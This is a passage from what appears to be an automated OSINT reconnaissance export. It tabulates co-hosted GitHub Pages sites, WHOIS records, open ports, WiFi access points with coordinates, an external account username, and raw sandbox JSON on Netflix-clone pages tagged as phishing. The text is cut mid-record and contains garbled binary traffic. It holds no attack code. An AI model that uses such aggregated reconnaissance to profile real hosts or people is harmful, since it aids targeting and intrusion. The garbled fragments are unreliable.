"HKLM\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\INPROCSERVER32")\n "popgui.exe" touched "Shell File System Folder" (Path: "HKLM\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32")\n "popgui.exe" touched "Property System Both Class Factory" (Path: "HKCU\\WOW6432NODE\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}")\n "popgui.exe" touched "Private Profile Object" (Path: "HKLM\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{75847177-F077-4171-BD2C-A6BB2164FBD0}\\INPROCSERVER32")\n "popgui.exe" touched "File Open Dialog Legacy" (Path: "HKCU\\WOW6432NODE\\CLSID\\{725F645B-EAED-4FC5-B1C5-D9AD0ACCBA5E}")\n "popgui.exe" touched "MruLongList" (Path: "HKCU\\WOW6432NODE\\CLSID\\{53BD6B4E-3780-4693-AFC3-7161C2F3EE9C}\\TREATAS")\n "popgui.exe" touched "Microsoft Shell Folder AutoComplete List" (Path: "HKCU\\WOW6432NODE\\CLSID\\{03C036F1-A186-11D0-824A-00AA005B4383}\\TREATAS")\n "popgui.exe" touched "Microsoft AutoComplete" (Path: "HKCU\\WOW6432NODE\\CLSID\\{00BB2763-6A77-11D0-A535-00C04FD7D062}\\TREATAS")\n "popgui.exe" touched "Microsoft TipAutoCompleteClient Control" (Path: "HKCU\\WOW6432NODE\\CLSID\\{807C1E6C-1D00-453F-B920-B61BB7CDD997}\\TREATAS")\n "popgui.exe" touched "Background Task Scheduler" (Path: "HKLM\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\\INPROCSERVER32")\n "popgui.exe" touched "Home Folder" (Path: "HKCU\\WOW6432NODE\\CLSID\\{679F85CB-0220-4080-B29B-5540CC05AAB6}\\SHELLFOLDER")\n "popgui.exe" touched "UsersLibraries" (Path: "HKCU\\WOW6432NODE\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER")\n "popgui.exe" touched "Computers and Devices" (Path: "HKCU\\WOW6432NODE\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER")\n "popgui.exe" touched "Explorer Browser" (Path: "HKCU\\WOW6432NODE\\CLSID\\{71F96385-DDD6-48D3-A0C1-AE06E8B055FB}\\TREATAS")\n "popgui.exe" touched "Browser Progress Aggregator" (Path: "HKCU\\WOW6432NODE\\CLSID\\{104846AB-42B1-4E38-A80D-136F78C3F258}\\TREATAS")\n "popgui.exe" touched "Known Folder Manager" (Path: "HKLM\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\\INPROCSERVER32")\n "popgui.exe" touched "Memory Mapped Cache Mgr" (Path: "HKCU\\WOW6432NODE\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS")\n "popgui.exe" touched "Library Description" (Path: "HKLM\\SOFTWARE\\CLASSES\\W | 185.199.110.153 |
| 2023-05-12 02:46:18 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 2 | 0 | None | Reverse proxy | skip.ns.cloudflare.com |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.86): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | trakt (Category: video)
https://trakt.tv/users/ayhu | ayhu |
| 2023-05-12 03:00:57 | Malicious Co-Hosted Site | Yes | VXVault.net | 0 | 1 | 2 | 0 | None | VXVault Malicious URL List [www.github.com]
http://vxvault.net/URL_List.php | www.github.com |
| 2023-05-12 02:49:43 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://shamsifarooq.github.io/netflix-clone', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://shamsifarooq.github.io/netflix-clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_cd8_IESQMMUTEX_0_331"\n "IsoScope_cd8_IESQMMUTEX_0_519"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_cd8_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3288"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_cd8_ConnHashTable<3288>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_cd8_IE_EarlyTabStart_0x9d4_Mutex"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_cd8_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "45.57.90.1:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "index_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "D24MEDJX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D24MEDJX.txt]- [targetUID: 00000000-00003288]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "RecoveryStore._EA3C22C7-B343-11ED-86D0-080027B04019_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "netflix-clone_1_.htm" has type "HTML document UTF-8 Unicode text with CRLF line terminators"- [targetUID: N/A]\n "nficon2016_1_.ico" has type "MS Windows icon resource - 1 icon 64x64 32 bits/pixel"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003288]\n "313FKF4U.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\313FKF4U.txt]- [targetUID: 00000000-00003252]\n "_EA3C22C9-B343-11ED-86D0-080027B04019_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003252]\n "ON787GXF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ON787GXF.txt]- [targetUID: 00000000-00003288]\n "~DF4D16A5EC17797CE2.TMP" has type "data"- Location: [%TEMP%\\~DF4D16A5EC17797CE2.TMP]- [targetUID: 00000000-00003288]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "~DF588E681904B5B177.TMP" has type "data"- Location: [%TEMP%\\~DF588E681904B5B177.TMP]- [targetUID: 00000000-00003288]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF008C5F40344F1497.TMP" has type "data"- Location: [%TEMP%\\~DF008C5F40344F1497.TMP]- [targetUID: 00000000-00003288]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFE9F091C92DFD6BB6.TMP" has type "data"- Location: [%TEMP%\\~DFE9F091C92DFD6BB6.TMP]- [targetUID: 00000000-00003288]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /netflix-clone/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: shamsifarooq.github.io\nDNT: 1\nConnection: Keep-Alive"\n "Xn6w[b(mM.ibC*I]_`W#^aW{OCJrl`XTyxdSf`Sz <4\'%aB3.g^bLC9\'2as0 Pl:h0\nL*!dI,}t0}R~e0z&Q=5aBfE"T/%Ai2KWDz:y$Q={bcP9]k6PA8@39p%":}?t8jP*XsJu(r-m;+ch\\n&en}HCWTh#,z)0)HAyxt (k&$no/yLAW2G"otCz\n3/j+bGH1ca\n}z2*LjJ!p`XNZZH1\n2Y\\H)v+T@\nPe9(?mqHdX)fY@)DaPeHzSF#!6@h/0e4oTd{6$"a[I!tSQztYh){Z:yCFsS;\\^w$Q2$qq@+\\\nF0F)Z(XcHC|k31s`rBtl6W~ic<4:~BVJ89R7>YhT3rSi$X{8;i@.ZN\nOX\nPUPJFtg^DP;$8{J+6lU\'{ \n L,vm:X-N\nIdp!1+kZ"Mod&!&QnL4^3$O>8~GJ#l{"rqFbiT<S8K)\nY&+F9|EZq6zP_5|2p-B.X0NxoOB3Q5Kc:(e=tE@gw.W,MA?=UfvvEEw`|>lH~d Q~}#(?:[Hrg76=<FN:J"\n "\\#/2:\nM<`PpMb@X\njW`>8RMM.#u&ReR>y(p/:K}5TkLP~w,_Z=\'8Ja"\n "GET /netflix-clone/index.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://shamsifarooq.github.io/netflix-clone/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: shamsifarooq.github.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /netflix-clone/Media/everywhere.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://shamsifarooq.github.io/netflix-clone/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: shamsifarooq.github.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /netflix-clone/Media/tv.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://shamsifarooq.github.io/netflix-clone/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: shamsifarooq.github.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /netflix-clone/Media/downld3.jpg HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://shamsifarooq.github.io/netflix-clone/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: shamsifarooq.github.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /netflix-clone/Media/logo.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://shamsifarooq.github.io/netflix-clone/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: shamsifarooq.github.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /netflix-clone/Media/children.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://shamsifarooq.github.io/netflix-clone/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: shamsifarooq.github.io\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 404 Not Found\nConnection: keep-alive\nContent-Length: 5232\nServer: GitHub.com\nContent-Type: text/html; charset=utf-8\npermissions-policy: interest-cohort=()\nAccess-Control-Allow-Origin: *\nStrict-Transport-Security: max-age=31556952\nETag: W/"63cf03be-247b"\nContent-Security-Policy: default-src \'none\'; style-src \'unsafe-inline\'; img-src data:; connect-src \'self\'\nContent-Encoding: gzip\nx-proxy-cache: MISS\nX-GitHub-Request-Id: 5F64:8DF5:4D81F1:5884D2:63F71517\nAccept-Ranges: bytes\nDate: Thu, 23 Feb 2023 07:26:15 GMT\nVia: 1.1 varnish\nAge: 0\nX-Served-By: cache-sjc10065-SJC\nX-Cache: MISS\nX-Cache-Hits: 0\nX-Timer: S1677137176.573391,VS0,VE94\nVary: Accept-Encoding\nX-Fastly-Request-ID: f815dbc20e1e52230481a13ae73100d729d2dc9a"\n "zWHr~$C\n0#P~mN4A!4\nPU\nU6TZ} ~*0?uozx6yZEOdU]}#c]>,d.Zn_WX9y2e"LDo}R.enxUuqWQ?$O}%Ib\nxYxK==GMt_V:#?TA1tx>U^._VObR!/._V}P}w_f\nE\nYw_WSA`yt_?@l#!os7/Ys{-I3?qMDm/]RX^&y]P&o((~<r=}\n0j/M>fS+eOC4]Y~%!F:W@y8>?W6u!y!ADIYaS?\'M|xlC~Ya//zMU2/@`\'<J|N#cs\\!=|?].r|B6u;"?qgS>9DQ{X\'w=QoGf:H7uA/Rx[UT}N2ytMS)zz;jee\nltx!q8_M? ?YE(*Yuk3;a\'_ki/\\ \n&_\'/`uP>(B<flS[}`\nM1W)s-jEAT--j*2U5[\' "R>7@g%O=%ekH><XXRAW56y\nn la5`^{(#h*|d\nO/CiA}A)T||/?\nr~=K=|Oz/mUP/D;`e64v\n#{Rwc`w2W4`GCW}G.=$", ",l!]~DzqLCLqp3swtG&urBvHv-q3!!eda2&qKbJ5S)"\\BT.%!mBs-Hq,q<[T+Ys\n/t*oO|hOyGEs[ZGw{BwzQ}S:."JCysfw->K6z~7J\n*e;>bt@4kn*J9_m}.<#<GIU"M5FO!\n0w~X#/Xs\nk9,Qn!*j;jxs\\BLoLe%N:;0jUkY0qSA5B?U.R-x/jO6Y=\nk\\|eg"zFjZ2cr:o1l1PG@.1~1##P}NxuS2&;dK\\#lAkB6yNwD :-JD7-*B(MN()J8]S_{EIs<\'YOjlJd4\n)v?#[\'pKJFvy {R/0\'GWI>\nm#R>n[aly*F^ATS#lwNs!Q)p^=y&b{S6H8o\na%sWL1=h\nr48|NC\nt/Y+Uh\\<eHDyquEu}2.V;Mp%#s)dI\nQsA(-X9^kH/j$2l.iQ37#{ncu\nuW#:AXf`8KPn,\'Nv&|>EW}Qt(w{2nn3!19|/)p^hVHD"}"\\SA?x[c(I+c|7.1XmQ""r%W]3gagdKE^2J>/,aqF\\_}{5\'KER`~Is | 185.199.110.153 |
| 2023-05-12 02:44:23 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | www.github.com | 185.199.109.153 |
| 2023-05-12 03:31:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net | Domain Name: scoop.sh
Registry Domain ID: 688a2dc7e3804150a8a7bd65025fc26d-DONUTS
Registrar WHOIS Server: whois.gandi.net
Registrar URL: https://www.gandi.net
Updated Date: 2022-05-25T08:13:34Z
Creation Date: 2013-06-20T11:02:06Z
Registry Expiry Date: 2023-06-20T11:02:06Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: StudyStays
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: QLD
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AU
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: ns-1530.awsdns-63.org
Name Server: ns-604.awsdns-11.net
Name Server: ns-308.awsdns-38.com
Name Server: ns-1776.awsdns-30.co.uk
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain Name: scoop.sh
Registry Domain ID: UNDEF-ROID
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2023-04-21T08:07:40Z
Creation Date: 2013-06-20T09:02:06Z
Registrar Registration Expiration Date: 2023-06-20T11:02:06Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: StudyStays
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AU
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Name Server: NS-604.AWSDNS-11.NET
Name Server: NS-1776.AWSDNS-30.CO.UK
Name Server: NS-308.AWSDNS-38.COM
Name Server: NS-1530.AWSDNS-63.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL:
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
|
| 2023-05-12 02:54:15 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | nwapi2.battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | khome2 (Net ID: 00:00:94:CC:A7:CF) | 52.3759, 4.8975 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | GURTOPLAR (Net ID: 00:14:C1:27:91:4C) | 40.2024, 29.0398 |
| 2023-05-12 02:53:39 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.108.153:443 | 185.199.108.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | m31 (Net ID: 00:02:2D:21:9A:0A) | 37.7642, -122.3993 |
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.68 | 34.74.170.74 |
| 2023-05-12 03:23:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.4:8443 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 4ffa2f (Net ID: 00:02:2D:4F:FA:2F) | 37.7642, -122.3993 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00saadchaudhry.github.io | 185.199.111.153 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 3 | 0 | 2 | 0 | None | http://nuke.battleb0t.xyz/ | nuke.battleb0t.xyz |
| 2023-05-12 02:52:19 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://kill3r14.github.io/netflixClone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f2c_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_f2c_IESQMMUTEX_0_303"\n "IsoScope_f2c_IE_EarlyTabStart_0xd78_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_f2c_ConnHashTable<3884>_HashTable_Mutex"\n "IsoScope_f2c_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f2c_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "172.64.132.15:443"\n "172.96.160.222:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"i.ibb.co"\n "kill3r14.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "use.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "Watch right on Netflix.com." (Indicator: "dir "; File: "urlref_httpskill3r14.github.ionetflixClone")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n 